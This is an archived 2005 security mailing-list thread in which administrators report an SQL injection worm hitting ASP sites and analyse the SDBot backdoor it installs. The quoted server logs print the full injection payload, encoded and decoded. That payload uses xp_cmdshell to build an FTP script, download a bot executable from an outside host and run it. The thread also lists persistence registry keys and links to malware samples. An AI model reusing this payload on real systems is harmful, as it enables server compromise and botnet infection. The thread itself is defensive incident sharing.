lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: tmyers at coactivesys.com (Tim Myers)
Subject: FW: Re: [Dshield] SQL injection worm ?


Maxime,

Here is the information I've gathered on lol.exe. Hope this helps you out or anyone else that has this worm. Let me know if you need anything else. 

Tim Myers


FILE INFORMATION:
The file consists of SDBot which is a Win32 Backdoor.
Packed/Encrypted with Morphine 1.2
The trojan connects to IRC Server - 170.211.69.66:6667 Where it will wait for commands.
Drops msgfix.exe into the \windows\system32 directory and adds itself to startup via HKLM\..\..\run

IP INFORMATION:
	[170.211.69.66]
OrgName:    Arkansas Public School Computer Network 
OrgID:      APSCN
Address:    #4 State Capitol Mall, Room 401A
City:       Little Rock
StateProv:  AR
PostalCode: 72201-1071
Country:    US

NetRange:   170.211.0.0 - 170.211.255.255 
CIDR:       170.211.0.0/16 
NetName:    APSCN-1
NetHandle:  NET-170-211-0-0-1
Parent:     NET-170-0-0-0-0
NetType:    Direct Assignment
NameServer: DNS3.STATE.AR.US
NameServer: DNS1.STATE.AR.US
Comment:    
RegDate:    1995-01-30
Updated:    2000-02-08

TechHandle: ZS25-ARIN
TechName:   State of Arkansas 
TechPhone:  +1-501-682-0500
TechEmail:  hostmaster@....state.ar.us 



SDBOT INFORMATION:
Backdoor.Sdbot is a server component (bot) that the Trojan's creator distributes over IRC channels. This Trojan horse allows its creator to perform a wide variety of actions on a compromised computer.

The Trojan arrives in the form of a Portable Executable (PE) file. 

When Backdoor.Sdbot is executed, it does the following:


Copies itself to the %System% folder. The file name to which it copies itself can vary. Some known file names are: 
Cnfgldr.exe
cthelp.exe
Sysmon16.exe
Sys3f2.exe
Syscfg32.exe
Mssql.exe
Aim95.exe
Svchosts.exe
FB_PNU.EXE
Cmd32.exe
Sys32.exe
Explorer.exe
IEXPL0RE.EXE
iexplore.exe
sock32.exe
MSTasks.exe
service.exe
Regrun.exe
ipcl32.exe
syswin32.exe
CMagesta.exe
YahooMsgr.exe
vcvw.exe
spooler.exe
MSsrvs32.exe
svhost.exe
winupdate32.exe
quicktimeprom.exe


NOTE: %System% is a variable. The Trojan locates the \Windows\System folder (by default, this is C:\Windows\System or C:\Winnt\System32), and then copies itself to that location. 


Adds one of the following values:

"Configuration Manager"="Cnfgldr.exe"
"System Monitor"="Sysmon16.exe"
"MSSQL"="Mssql.exe"
"Configuration Loader" = "aim95.exe"
"Internet Config" = "svchosts.exe"
"System33" = "%System%\FB_PNU.EXE"
"Configuration Loader"="cmd32.exe"
"Windows Explorer"="Explorer.exe"
"Configuration Loader"="IEXPL0RE.EXE"
"Configuration Loader"="%System%\iexplore.exe"
"Sock32"="sock32.exe"
"Configuration Loader"="MSTasks.exe"
"Windows Services"="service.exe"
"Registry Checker" = "%System%\Regrun.exe"
"Internet Protocol Configuration Loader" = "ipcl32.exe "syswin32" = "syswin32.exe"
"MachineTest" = "CMagesta.exe"
"Yahoo Instant Messenger" = "Yahoo Instant Messenger"
"Fixnice" = "vcvw.exe"
"Windows Configuration" = "spooler.exe"
"Microsoft Video Capture Controls" = "MSsrvs32.exe"
"Microsoft Synchronization Manager" = "svhost.exe"
"Microsoft Synchronization Manager" = "winupdate32.exe"
"Quick Time file manager" = "quicktimeprom.exe"
"cthelp"="cthelp.exe"

or a similar value to the following registry keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
RunServices

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Backdoor.Sdbot contains its own IRC client, allowing it to connect to an IRC channel that was coded into the Trojan. Using the IRC channel, the Trojan listens for the commands from the Trojan's creator. The creator of the Trojan accesses the Trojan by using a password-protected authorization. 

The commands allow the Trojan's creator to perform any of the following actions: 
Manage the Backdoor installation. 
Control the IRC client on a compromised computer. 
Dynamically update the installed Trojan. 
Send the Trojan to other IRC channels to attempt to compromise more computers. 
Download and execute files. 
Deliver system and network information to the Trojan's creator. 
Perform Denial of Service (DoS) attacks against a target, which the Trojan's creator defines. 
Completely uninstall itself by removing the relevant registry entries.









-----Original Message-----
From: full-disclosure-bounces@...ts.netsys.com [mailto:full-disclosure-bounces@...ts.netsys.com] On Behalf Of Maxime Ducharme
Sent: Wednesday, January 19, 2005 2:13 PM
To: full-disclosure@...ts.netsys.com; General DShield Discussion List; incidents@...urityfocus.com
Subject: [Full-Disclosure] Re: [Dshield] SQL injection worm ?


Hi to the List

today we received the same SQL injection attack on the same URL :

IP : 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :
377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection :
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 jan. doesnt find anything suspicious.

I'm interested if someone do an analysis on this file.

Have a nice day

Maxime Ducharme
Programmeur / Sp?cialiste en s?curit? r?seau


----- Original Message -----
From: "Maxime Ducharme" <mducharme@...ergeneration.com>
To: <full-disclosure@...ts.netsys.com>; "General DShield Discussion List"
<list@...ts.dshield.org>; <incidents@...urityfocus.com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: [Dshield] SQL injection worm ?


>
> Hi list,
>     we receveid a particular SQL injection attack on one of our site.
>
> Attack looks like :
> 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET 
> /Nouvelles.asp
>
id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
>
%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
>
8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
> en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
>
5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
>
68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
>
5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
>
%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
>
5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
>
system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
>
8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
>
Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
>
78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
>
t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
>
%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
>
5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
>
3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
>
cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
> e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 
> attacked.web.site.com - - -
>
> HTTP request contains only 2 fields (beside HTTP method) :
> Connection: Keep-Alive
> Host: attacked.web.site.com
>
> (I obviously replaced the name of the site).
>
> Decoded SQL injection looks like :
> exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
> exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> 
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> 
> %systemroot%\system32\macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo get rBot.exe 
> %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> 
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo quit >> 
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell
> 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'del
%systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 
> '%systemroot%\system32\Macromed\lolx\arcdlrde.exe
>
> y.y.y.y is a foreign IP in Europe which host FTP an WWW server.
> I sent a notice this this site sysadmin about the situation.
>
> I have been able to connect to this FTP with the account 
> hahajk/hahaowned (which do not seem legit to me ...) and download suspicious files.
> I mirrored them here :
> http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
> zip pass is 968goyw439807r3qw
>
> 24.164.202.24 is on rr.com networks, they have also been advised.
>
> I know rbot.exe is known to be Randex worm, but i'd like that have 
> some other results / analysis.
>
> I also found a "test.asp" file which contains the Spybot worm.
>
> Weird thing is, I searched for this hosts's activity on every server 
> and every firewall we run, and I only see 1 TCP connection which is 
> the prepared SQL injections attack, nothing else.
>
> Anybody see similar activity ?
>
> I'm asking since I want to know if we are targeted by someone of by a 
> worm like Santy of use search engines to find vulnerable ASP scripts.
>
> Thanks in advance
>
> Happy new year to everyone !
>
> Maxime Ducharme
> Programmeur / Sp?cialiste en s?curit? r?seau
>
>
>
> -------------- Sponsor Message ------------------------------------
> SANS Intrusion Immersion Training: Orlando, FL, February 3-9th
> http://www.sans.org/orlando05
>
> _______________________________________________
> send all posts to list@...ts.dshield.org To change your subscription 
> options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ